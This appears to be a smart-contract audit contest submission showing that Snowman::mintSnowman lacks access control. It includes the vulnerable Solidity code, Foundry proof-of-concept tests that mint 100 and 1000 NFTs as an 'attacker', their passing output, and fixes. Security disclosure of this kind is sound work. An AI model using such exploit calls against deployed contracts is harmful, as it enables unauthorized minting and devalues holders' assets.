Snowman Merkle Airdrop
AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Missing access control on `Snowman::mintSnowman` allows anyone to mint unlimited NFTs, bypassing the entire airdrop mechanism

404persona

Description

  • The Snowman protocol is designed so that users must first acquire Snow (ERC20) tokens, stake them through the SnowmanAirdrop contract using a valid Merkle proof and ECDSA signature, and only then receive Snowman NFTs proportional to their Snow balance.

  • Snowman::mintSnowman() is an unrestricted external function with no access control. Any address can call it directly to mint an arbitrary number of Snowman NFTs to any receiver, completely bypassing the Snow token staking requirement, Merkle proof verification, and signature validation.

// src/Snowman.sol:36-44
function mintSnowman(address receiver, uint256 amount) external {
// @> No onlyOwner, no onlyAirdrop, no access control whatsoever
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Risk

Likelihood:

  • The function is publicly callable with zero prerequisites — no tokens, no proofs, no signatures needed

  • Any EOA or contract can call mintSnowman at any time after deployment

Impact:

  • Attacker mints unlimited Snowman NFTs without staking any Snow tokens

  • The entire airdrop mechanism (Merkle tree, staking, signatures) is rendered useless

  • NFT supply is inflated to arbitrary amounts, destroying scarcity and value

Proof of Concept

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.24;
import {Test, console2} from "forge-std/Test.sol";
import {Snowman} from "../src/Snowman.sol";
import {DeploySnowman} from "../script/DeploySnowman.s.sol";
contract PoC_C01 is Test {
Snowman nft;
address attacker;
function setUp() public {
DeploySnowman nftDeployer = new DeploySnowman();
nft = nftDeployer.run();
attacker = makeAddr("attacker");
}
// C-01: Snowman::mintSnowman has no access control.
// Anyone can mint unlimited NFTs without staking Snow tokens.
function test_C01_MintSnowmanNoAccessControl() public {
uint256 nftsBefore = nft.getTokenCounter();
console2.log("NFT counter before attack:", nftsBefore);
console2.log("Attacker NFT balance before:", nft.balanceOf(attacker));
// Attacker directly calls mintSnowman — no Snow tokens, no merkle proof, no signature
vm.prank(attacker);
nft.mintSnowman(attacker, 100);
console2.log("Attacker NFT balance after:", nft.balanceOf(attacker));
console2.log("NFT counter after attack:", nft.getTokenCounter());
assertEq(nft.balanceOf(attacker), 100);
assertEq(nft.getTokenCounter(), nftsBefore + 100);
}
}

Output:

[PASS] test_C01_MintSnowmanNoAccessControl() (gas: 3391860)
Logs:
NFT counter before attack: 0
Attacker NFT balance before: 0
Attacker NFT balance after: 100
NFT counter after attack: 100

Recommended Mitigation

Restrict mintSnowman to only be callable by the SnowmanAirdrop contract. Store the airdrop contract address in state, add an onlyAirdrop modifier that reverts for all other callers, and apply it to mintSnowman. The owner sets the airdrop address once after deployment via setAirdropContract. This ensures NFTs can only be minted through the intended claim flow (Merkle proof + signature + Snow staking).

+ error SM__NotAllowed();
+ address private s_airdropContract;
+ modifier onlyAirdrop() {
+ if (msg.sender != s_airdropContract) {
+ revert SM__NotAllowed();
+ }
+ _;
+ }
+ function setAirdropContract(address _airdrop) external onlyOwner {
+ s_airdropContract = _airdrop;
+ }
- function mintSnowman(address receiver, uint256 amount) external {
+ function mintSnowman(address receiver, uint256 amount) external onlyAirdrop {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 1 hour ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!